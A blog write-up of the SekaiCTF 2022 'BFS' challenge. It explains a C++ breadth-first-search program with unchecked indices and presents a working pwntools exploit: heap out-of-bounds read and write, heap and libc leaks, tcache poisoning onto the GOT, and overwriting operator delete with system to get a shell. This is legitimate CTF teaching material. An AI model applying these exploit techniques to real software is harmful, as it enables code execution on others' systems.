Day91's Blog It's daytime somewhere :)

SekaiCTF 2022: BFS

This was a pretty interesting c++ binary exploitation challenge I solved(first blood, always be flexing 😛)

It consisted of a no pie and partial relro heap exploitation of a vulnerable C++ implementation of breadth first search unweighted shortest-path finding.

I didn’t really start the challenge until night time on saturday when I noticed the source was released after giving up on Mind Calculator, lol

Let’s get into solving the challenge!

Introduction

I’m going to explain a couple ADT’s used in this program just to make it easier to understand. Note that this writeup assumes some basic knowledge of glibc heap exploitation, and some basic binary exploitation stuff.

Graphs

To those unfamiliar, a graph is an Abstract Data Type represented by many nodes or “vertices” which are connected with edges. A graph can be used to represent many things, commonly maps or areas. Graphs are often represented as an adjacency matrix, where each row would represent the relationships for a given node, and each value in that row gives information on if there is a connection between the two nodes. For example matrix[0][1] would tell you if there’s a connection between node 0 and node 1.

In this ase the adjacency matrix was implemented as a 1d array where matrix[a][b] = adj_matrix[a * 256 + b]

Graphs can be traversed to find paths between two nodes by two main algorithms - depth-first search and breadth-first search. The former is not important for this challenge.

Breadth-first search essentially works by starting at a node, and then looking first at all the connections to that node. Then, for each of those nodes, look at their connections, ignoring previously visited nodes. It basically goes layer by layer, thus going for breadth first. Since BFS(breadth-first-search) goes layer by layer, the first path it finds will always be the shortest in an unweighted graph. Depth-first search works differently, essentially going as far as it can in one direction until it needs to backtrack. (It goes for depth first!)

The details of the algorithm are not that important for understanding the challenge solution but it is helpful.

Queues

A queue is pretty intuitive, usually a FIFO data structure - data is pushed onto the queue, and popped off of it. The value popped off is the first value to have been pushed onto it, and so forth. Queues can be implemented statically(with a fixed size array) or dynamically(allocating as required). Dynamically it is often done with a linked list but not always, as we will see later!

There are double-ended queues or dequeues which are essentially the same but let you push and pop from both ends of the queue.

Queues can also be linear or circular- a linear queue works by keeping a front and a back pointer and pushing values onto the back and popping them off the front. As values are pushed and popped(or enqueued and dequeued) off the queue, however, it simply “shifts” - it doesn’t reuse space which has since become useless. A dynamic linear implementation may use a linked list, in which case space is not wasted, but otherwise it may keep allocating new space as it shifts, which does waste space(but is very helpful for us!)

A circular queue wraps around itself and uses memory space from the front that is now unused, however at the cost of having to maintain more information.

Source Code Analysis

The program sets a maximum number of nodes(256) and represents the graph via an adjacency matrix implemented as a single 1-dimensional array as 256*256 in size, taking a static approach. It uses vis and parent arrays to keep track of visited nodes and parent nodes respectively(with parent[node_idx] giving the "parent" of that node in the path.

All these arrays are allocated on the heap via the new keyword in c++, which will be important later.

The BFS algorithm is as follows,

void bfs(uint from, uint dest, uint n)  {
    uint tmp = 0;
    parent[from] = from;
    q.push(from);
    vis[from] = 1;
    while(!q.empty())   {
        tmp = q.front();
        q.pop();
        for (int i = 0; i < n; i++) {
            if(adj_matrix[tmp*MAX_NUMBER_OF_NODES + i] != 0 && vis[i] != 1) {
                vis[i] = 1;
                parent[i] = tmp;
                q.push(i);
                if (i == dest)
                    return;
            }
        }
    }
    return;
}

In simpler terms,

Set the start node's parent to itself, denoting it is the start.
Push it into the queue.
While the queue is not empty,
	Pop a node index off the queue, set it to tmp
	For all nodes, if node is connected to tmp and has not been visited,
		Set the node's visited status to true
		Set the node's parent to tmp
		Push the node onto the queue
		If the node is our destination, return

I didn’t discover this until later, but there is an inherent issue with this code - if the function does not naturally terminate from the while loop ending(i.e the queue is empty and all values have been popped off and traversed) and instead terminates within the for loop, the queue will not be cleared. This doesn’t directly introduce any serious memory corruption vulnerabilities, but it is something that will be useful during the exploitation process.

Now to understand how the main program operates.

The challenge description already gives a pretty sound description of the input format

Each test contains multiple test cases. The first line contains a single integer T - the number of test cases. Description of the test cases follows.

The first line of the input contains two unsigned integers N and K - the number of nodes and edges respectedly.

Each of the next K lines contains two unsigned integers V and U - the description of an edge.

The last line contains two unsigned integers P and Q - the to and from nodes.

int main(int argc, char const *argv[])
{
    init();
    std::string choice;
    uint q, n,k;
    uint from, dest, crawl;
    std::cin >> q;
    for (uint l = 0; l < q; l++)
    {
        std::cin >> n >> k;
        if(n > MAX_NUMBER_OF_NODES) {
            exit(0);
        }
        for (size_t i = 0; i < n; i++)
            for (size_t j = 0; j < n; j++)
                adj_matrix[i*MAX_NUMBER_OF_NODES + j] = 0;
        for (size_t i = 0; i < n; i++)
            vis[i] = 0;
        for (size_t i = 0; i < k; i++)
        {
            std::cin >> from >> dest;
            adj_matrix[from*MAX_NUMBER_OF_NODES + dest]++;
            adj_matrix[dest*MAX_NUMBER_OF_NODES + from]++;
        }
        std::cin >> from >> dest;
        bfs(from, dest, n);
        crawl = dest;
        std::cout << "Testcase #" << l << ": ";
        while(parent[crawl] != crawl)   {
            std::cout << crawl << " ";
            crawl = parent[crawl];
        }
        std::cout << crawl << std::endl;
    }
    return 0;
}

The program doesn’t take all of the test cases at once but instead forms an interactive prompt, which is again going to be useful for exploitation.

It clears as much of the vis array and adjacency matrix as matters for the given amount of nodes, and then adds all the edges to the adjacency matrix pretty intuitively, going both ways.

Most notably, there are no bounds checks at all. Whilst it makes sure that you don’t set a number of nodes higher than the maximum before clearing the relevant indexes of the vis and adjacency matrix arrays, individual node indexes are not checked when

  • Adding edges in the adjacency matrix
  • Running the BFS algorithm
  • Crawling to find the path via the parents array

The first and third of these vulnerabilities will be what we use the most. Having found all of these, it’s time to get exploiting.

Gaining Primitives

The top three primitives I used for my exploit were

  • Heap OOB write whilst knowing the original data
  • Heap OOB read
  • Heap allocation, freeing, and population of fixed sizes

I used the provided Dockerfile to debug locally. For transforming normal dockers into a debug environment, I usually add a

ENV DEBIAN_FRONTEND noninteractive
RUN apt install -y gdb python3 curl python3-pip wget git ltrace

And run the docker whilst forwarding the port to my host. I usually drop into a shell with docker exec -u 0 /bin/bash and then install pwndbg in /opt using

git  clone https://github.com/pwndbg/pwndbg
cd pwndbg
./setup.sh

That sets up a pretty nice debug environment, for which after connecting to the program on the host you can run gdb -p $(pidof bfs) in the docker.

I built a simple skeleton to communicate with the program by sending test cases, and ability to receive the path information.

I also copied the libc file out of the docker with docker cp.

from pwn import *
e = ELF("./bfs")
context.binary = e
libc = ELF("./libc.so.6")
if args.FULLREMOTE:
    p = remote("challs.ctf.sekai.team", 4004)
else:
    p = e.process() if args.LOCAL else remote("localhost", 1337)
p.sendline("5000") # Should be enough test cases!
def sendtestcase(numnodes, start, to, edges=[]):
    if type(edges[0]) == int:
        edges = [edges]
    p.sendline(f"{numnodes} {len(edges)}")
    for edge in edges:
        p.sendline(f"{edge[0]} {edge[1]}")
    p.sendline(f"{start} {to}")

def recvdata(interactive=False):
    if interactive:
        p.interactive()
        quit()
    p.recvuntil(": ")
    data = p.recvline()[:-1].decode().split(" ")
    return [int(x) for x in data]

Heap OOB write whilst knowing the original data

One interesting thing is that when adding edges to the adjacency matrix it uses the ++ syntax as opposed to setting it to 1 directly. This means that when we use the OOB vulnerability, we can begin to edit the data as it will simply increment as opposed to setting to 1, giving a powerful primitive. With the ability to put arbitrary node indexes, we can make sure that from * MAX_NUMBER_OF_NODES + dest equals an index to the arbitrary byte that we want. Note that all of the arrays we have been talking about are of type uint8_t

As numbers will overflow, so 0xff + 1 will wrap around to 0, this creates a full OOB write primitive - as long as we know the original value. Without that, we can only blindly add. This means leaking will be important in the exploit later. However, we can now build the OOB write primitive. My primitive function, given parameters, constructs the series of edges required to do the editing that was needed.

NOTE: I did attempt to go backwards with this, but it appears it is impossible, as from and dest are type uint and so will not be sign extended for additions. This means that, for example, 1 + 0xffffffff which would give 0 when dealing with sign extended integers, gives 0x100000000 instead - the carry bit won’t be ignored, so overflowing the address to go backwards is not possible.

def edit_data(data, turninto, idx):
    if type(data) == int:
        data = p64(data)
    if type(turninto) == int:
        turninto = p64(turninto)
    # Build edges that do arbitrary write at a given offset.
    # Requires knowledge of what the original data was.

    # NOTE: There will be side effects becausee edges go both ways. I wonder if this matters.
    data = bytearray(data)
    turninto = bytearray(turninto)
    edges = []
    for i, num in enumerate(data):
        diff = (turninto[i] - num) % 256
        cur = idx + i 
        edge = list(divmod(cur, 256)) # 256*from + dest, we dont just use 0 and the offset we want because then 256*dest + from will be invalid
        edges += [edge for _ in range(diff)] # Add 1 that many times
    return edges

Heap OOB read

This is somewhat easier. Consider the following snippet of code:

		crawl = dest;
		std::cout << "Testcase #" << l << ": ";
        while(parent[crawl] != crawl)   {
            std::cout << crawl << " ";
            crawl = parent[crawl];
        }
        std::cout << crawl << std::endl;

Should the bfs function have worked as intended, traversing the parents of each node until you find a node that is marked as the beginning would work for finding the path. What if we send an ending value that could never be found, though?

The bfs function would, necessarily, end up terminating after popping all the values of the queue and having nothing left, exiting the while loop. Afterwards, however, parent[crawl] is read, thus giving us an OOB read if we use it correctly.

Since this array is of type uint8_t, it means that the value that will be read will only be a singular byte, and most notably still a valid index in the parent array which it will continue to traverse until it finds an ending. The parent array will likely be set up to not cause an infinite loop in this situation(likely… see our issues later!) so we can build a simple OOB read primitive by setting the destination node to be an arbitrary index and thus being able to leak the byte at that index.

def read(offset, num, interactive=False):
    b = b''
    for i in range(num):
        sendtestcase(2, 0, offset + i, [[0,1]])
        b += bytes([recvdata(interactive)[1]])
    return b

Heap allocation primitives: transient

This is the hardest bit that made me scratch my head for ages. With just a heap OOB r/w, but with no way to allocate properly, it’s next to useless. I first tried to execute an unlink attack with the buffer chunk allocated to receive our input from stdin, but the chunk was never freed, so that was a bit useless.

I have had very unenjoyable experiences attempting to mess with c++ objects in the past so I didn’t really feel like touching the queue object, but it was the only option really. It turns out, it was a lot more intuitive to understand thanI thought, and was invaluable for the exploit.

I researched the std::queue implementation and found it was wrapped around a std::dequeue, which is obviously not that helpful lol

I then researched the std::dequeue implementation and found this stack overflow post which was very helpful. This answer in particular.

The dequeue is, as far as I can understand, a dynamic linear implementation of a queue using a vector of vectors, we can think of it as a linear queue which stores pointers to mini linear queues that have the actual values.

The queue starts with a singular pointer in its vector to a large chunk with space for 512 values. For now, since the queue is linear, it will suffice to cause 256 different values to be pushed onto the queue via the breadth first traversal algorithm(and subsequently popped off), then another 256. This will cause the queue to allocate a new chunk for use as a second vector(recall that linear queues do not go back and use space even when earlier values have been popped off), whilst freeing our original chunk since all the values on it have been popped off.

With a little bit of massage from that, it’s pretty easy to get a free chunk to appear after the adj_matrix and parents array despite the queue being allocated beforehand, which we can then mess with.

# HEAP ALLOCATION PRIMITIVE: QUEUE MANIPULATIOn
# When it finds a node, it leaves the queue full, letting us arbitrarily inflate and deflate at will(with clever calculations of course)#
# Actually the queue implementation is kinda bad so we don't even need to use the vuln to populate it o/

def populatequeue():
    edges = [[0, i] for i in range(1, 256)]
    sendtestcase(256, 0, 512, edges)
    edges = [[0, i] for i in range(1, 256)]
    sendtestcase(256, 0, 512, edges)
    p.clean(0.2)

Later, we will discuss how to fill the queue arbitrarily rather than values being popped off as soon as we add them, letting us fill the heap as required.

Beginning to leak critical values

Heap address

The first vector chunk for the queue will be before the arrays we can OOB on. However, if we do 512 queue pushes twice (1024) in total. What will happen is

  • New chunk(after our OOB arrays)
  • New chunk is freed
  • Another new chunk is allocated, will be on top of the old chunk because of how the tcache works

Most notably there will be a chunk after our oob arrays which is freed, letting us manipulate the heap.

What can we leak from our OOB read with the heap chunk? In this glibc version the tcache_key value is now just random as opposed to the address of the tcache_perthread_struct, so we’re going to have to resort to the encrypted tcache pointer.

Tcache “safe linking” pointer encryption is relatively simple - the pointer is encrypted as P ^ (L >> 12) where P is the pointer value and L is the location at which the pointer is going to be stored. In this case, since the chunk is the only one on the tcache, P is a null pointer, So we get a free leak of the top nibbles of a heap address. The last three nibbles are deterministic anyway, and the program has relatively little noise(as well as a docker being provided) so we can easily rebase the heap address.

safelink = lambda P, L: (L >> 12) ^ P
cleanup = lambda: p.clean(0.2)
populatequeue()
populatequeue()
# Null safe link ptr, easy to decode
leak = (u64(read(0x11020 + 0x110, 8)) << 12) + 0x350
heapbase = leak - 0x23350
log.info(f"Heap base: {hex(heapbase)}")

The offsets are so large because the adj_matrix array is 65536 bytes long. The offset of the chunk afterwards is pretty much just size of parents array + size of adj_matrix array + size of string buffer for input, with a few extra 16’s added because of how the heap works.

Anyway, with this, we can leak the heap address. Onto libc!!

Leaking the libc address

A better heap primitive

The best way to leak the libc base in a heap exploit is to leak an unsorted bin pointer after either freeing a really large chunk, or filling up the tcache for that size(max 7) and then freeing another chunk of that size. (For those who don’t know, the unsorted bin doubly linked list is terminated not by null pointers but by pointers to the bin location itself in glibc. This is useful for a couple cases with unlinking, and also for us exploiters 😛)

We don’t have the option to allocate and free chunks greater than tcache size, so tcache filling it is.

But there’s an issue: if values keep getting popped off the queue as we add them, the linearity won’t help us. As demonstrated earlier, the queue will end up reallocting at the same two addresses, and the tcache will never get to above one chunk in it.

Instead, we must exploit the vulnerability I discussed earlier with the queue. Instead of using unfindable ends like we have been previously, lets make the bfs algorithm actually find a valid path 😁

That’ll allow some values to stay in the queue as we wish, which is pretty useful. We can build a graph with 0 connecting to all other nodes, and search for 255, which will be pushed(and not popped) last. Since it only goes one layer deep, there won’t be any popping of values 1-255. This, however, creates an issue for repetition.

Next time we call the bfs algorithm, the first value to be popped off the queue will be 1, since that was most recently pushed. That means, if we send the first graph once more, it won’t really work out in our favour, since it’ll traverse starting at 1, then 2, etc.

The solution is to keep track of what the first value on the queue will be, and set the graph up such that every other node is connected to that node.

For future, sometimes we won’t want to populate the queue to completion. To account for this I implemented a feature that allows it to stop on the last population at a certain value. This will be useful later, after we achieve tcache poisoning

first = 0
def populatenofree(num, partial=None):
    # Make it find it so it doesnt pop off(need to make sure that doesnt mess up future traversals doe)
    global first
    for j in range(num):
        edges = [[first, i] for i in list(range(0, first)) + list(range(first + 1,256))]
        if j == num - 1 and partial is not None:
            edges2 = []
            for edge in edges:
                if edge[1] == partial:
                    break
                else:
                    edges2.append(edge)
            sendtestcase(partial, first, partial - 1, edges2)
        else:
            sendtestcase(256, first, 255, edges)
        first += 1
    p.clean(0.2)

Leaking libc

From there, the libc leak is relatively intuitive, we just populate the queue a whole load (about 16 or above should do) and then use an unfindable value to pop every value off of the queue, successfully dumping a chunk into the unsorted bin for some juicy leaks.

populatenofree(18)
# Unfindable, pop everything off the queue, freeing a bunch of chunks and placing a libc pointer strategically on the heap
sendtestcase(2, 0, 512, [[0,1]])
recvdata()
libcleak = u64(read(0x11e20 + 0x10, 8))
log.info(f"Libc leak: {hex(libcleak)}")
libc.address = libcleak - 0x219ce0
log.info(f"Libc base: {hex(libc.address)}")

After being able to rebase libc, the main exploit can now begin!

Leveraging our primitives and leaks into a shell

So, we have an oob write, an oob read, good allocation primitives and some leaks. How are we gonna turn that into a shell?

A classic free hook replace with system would be in order here, but with this challenge being one of the latest glibcs, allocation hooks have been removed.

Running a simple checksec, we see these protections(yes, I use kali, I’m deeply sorry)

┌──(kali㉿kali)-[~/CTFs/sekai/dist]
└─$ pwn checksec bfs  
[*] '/home/kali/CTFs/sekai/dist/bfs'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

No PIE and partial RELRO is perfect for a GOT overwrite. Looking at the GOT, basically all of the function names were mangled. I used http://demangler.com/ to demangle them, and eventually found that the function name _ZdlPvm demangles to operator delete(void*, unsigned long), i.e it’s the delete function. This is big.

My plan was as follows:

  • Use out-of-bounds write to execute a tcache poisoning attack
  • Get a queue chunk to allocate on top of _ZdlPvm@got (I am going to refer to it as delete@got for the rest of the writeup)
  • Overwrite the address stored at delete@got with system@libc
  • This means that whenever the program tries to free something, it will call system instead. Get the queue to free a chunk beginning with /bin/sh or something similar.

There is an issue with my tcache poisoning plan though - unfortunately the tcache code sets the second qword of an allocated chunk to nulls, to prevent the tcache_key from being leaked. In terms of the GOT, that can be a bit catastrophic, and caused a useful function pointer to be garbled.

I ended up instead attempting to get an allocation at delete@got - 16 since the value at delete@got - 16 + 8 never got called. The value at delete@got - 16 did get called though, so I couldn’t just fill it with garble until I got to delete@got. We’ll see my solution in a second.

Getting tcache poisoning was pretty simple, just find the offset to a tcache chunk to target and then overwrite its pointer with another safely linked version.

# Luckily we can calculate every single value on the heap as we know heap + libc and the heap is deterministic
loc = heapbase + 0x23e40

# Tcache poison to delete@got 
edges = edit_data(safelink(heapbase + 0x23c30, loc), safelink(e.got['_ZdlPvm'] - 16, loc), 0x11b10)

sendtestcase(2, 0, 1, edges)
cleanup()
first = 0

Note that after undoing all of the work populatenofree did, first must be reset to reflect that the queue is now empty.

Checking in pwndbg, we get tcache poisoning! 0x210 [ 7]: 0x1ac3e40 —▸ 0x407060

Setting up for the delete

We need to construct a queue chunk such that it’s beginning is a nice string for system to be called on. But how to do that?

They need to be pushed in order, but most importantly they need nothing else to get pushed in between them. My solution was to essentially find out what first was, and connect it to the first character. Then, find out what first + 1 was, and connect it to the second character, and so forth. That way as it pops off those values from the queue to traverse, it’ll find only the character we want at that position and push it onto the queue.

Note that the “from” character is always pushed no matter what, and then it won’t find any children of first since the “from”(which we set to the first character) will have vis set to 1. But then first + 1 will have the second character as a child, etc.

The issue with this is that the logic totally breaks down if there are repeated characters. This means /bin/sh is off the cards, but sh works just as fine. Later, we will get this issue with null bytes, to which my solution was to pretty much break up the writing.

Some debugging led me to getting that stopping at 0xdd while filling would mean the next character goes on its own chunk. After we’re done, we stop at 0xfd(256 - 3) to fill up that chunk, such that the next data will be written at the GOT!

Note that we use the dest value of the last character we want to push so it stops there and doesn’t pop everything off the queue, destroying all of our hard work!

populatenofree(2,partial=0xdd)

topush = b"sh\x00"

# Make each of the things that are gonna be popped off point to a char of the string we wanna push
edges = [[first + i, topush[i]] for i in range(0, len(topush))]
print(edges)

sendtestcase(256, topush[0], topush[-1], edges)
first += 3

populatenofree(2, partial=0xfd)

Note that we manually increment first since it’s going to have changed.

Executing the GOT overwite to pop a shell

We’re almost there!

So the solution to the problem I presented earlier is just to overwrite the first function pointer with a return gadget. As long as the return vlaue of the function is unimportant, this should cause no issues. The function we end up overwriting, demangled, is std::basic_ostream<char, std::char_traits<char> >& std::operator<< <std::char_traits<char> >(std::basic_ostream<char, std::char_traits<char> >&, char const*) which is a function for output. The return value should be relatively unimportant, although do note that after we mess up the function pointer it sort of screws the whole program’s output from then on lol

Anyway, remember what I said about the null bytes? That’s relevant here. Obviously the address we’re trying to write has two null bytes at its end, but we can’t do two null bytes at once! The best we can do is do them separately. We write the first 7 bytes of the address first.

rop = ROP(libc)
full = p64(rop.ret.address)
topush = full[:7]
edges = [[first + i, topush[i]] for i in range(0, len(topush))]


sendtestcase(256, topush[0], topush[-1], edges)

first += 7

Now for the part that drove me insane for a whole half hour. From here writing a singular null byte and then some garbage and then libc@system at delete@got seems easy, but it’s totally not. Why not? One word - loop.

Remember what I said about the parents array usually not setting up an infinite loop? Well it turns out when you abuse the bfs algorithm such a high amount, sometimes you don’t really get what you want!

The result? After getting a successful overwrite, when trying to crawl back and find the path, the program gets stuck in an infinite loop. The last character I pushed would go up to 27 in the crawl, and from there it would infinite loop as 27’s parent had been set to all sorts of things in the past. Changing the dest value didn’t help for various reasons - trust me, I tried.

Luckily, there was one glorious, beautiful, amazing line of code that would save me from this horror. parent[from] = from;

If I could just set from to 27, it would fix its entry in the parent array forever. Then, it’s all rainbows and cupcakes! That would also cause 27 or 0x1b to be pushed onto the queue though, we don’t want that happening just about anywhere. Since we’re planning to garble up the address just before delete@got anyway, that’s the perfect place to let it happen. All we need to do now is do the extra null byte(and one other byte for good measure) on its own, and then the rest.

topush = b"\x00\x08"
edges = [[first + i, topush[i]] for i in range(0, len(topush))]


sendtestcase(256, 0, topush[-1], edges)

first += 2

topush = p64(0x0102030405060708)[2:] + p64(libc.symbols['system'])[:6]
edges = [[first + i, topush[i]] for i in range(0, len(topush))]
print(edges)
print(first, edges)

sendtestcase(256, 27, topush[-1], edges)
print(hex(libc.symbols['system'])

We only send 6 bytes of my 0x0102030405060708 garble, since one was already written and the other is going to become 0x1b as 27 is pushed.

This fixes the issue, and voila!

pwndbg> x/10qwgx 0x407060
0x407060 <_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc@got.plt>:     0x00007fa95764ccd6      0x0102030405061b08
0x407070 <_ZdlPvm@got.plt>:     0x00007fa957673d60      0x00007fa9579a68f0
0x407080 <__stack_chk_fail@got.plt>:    0x0000000000401100      0x00007fa957665420
0x407090 <exit@got.plt>:        0x0000000000401120      0x00007fa9579a8570
0x4070a0 <_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1Ev@got.plt>:   0x00007fa9579b70a0      0x0000000000401150
pwndbg> x/x 0x00007fa957673d60
0x7fa957673d60 <__libc_system>: 0x74ff8548fa1e0ff3

As always, now we just make the bfs algorithm attempt to find an unfindable value, popping everything off the queue and getting the chunks freed in the process. delete(“sh”) will be called, actually calling system(“sh”)!

p.sendline("256 0")
p.sendline("0 69420")
p.interactive()

The exploit fails sometimes because of some specifics with bytes, repeats etc., but it’s relatively reliable. With that, we can pop a shell and get the flag.

Flag: SEKAI{what_do_you_mean_my_integers_have_to_be_checked?_i_never_needed_to_do_that_in_programming_competitions}

The author had a way less complicated solution than I did, but I still had loads of fun doing it, and learned quite a bit about c++ in the process! I hope this helps people to learn something too!

Full exploit here: https://github.com/Day91/Writeups/blob/master/SekaiCTF/bfs.py

MapleCTF 2022: Maplewave Challenges TetCTF 2023: Mailservice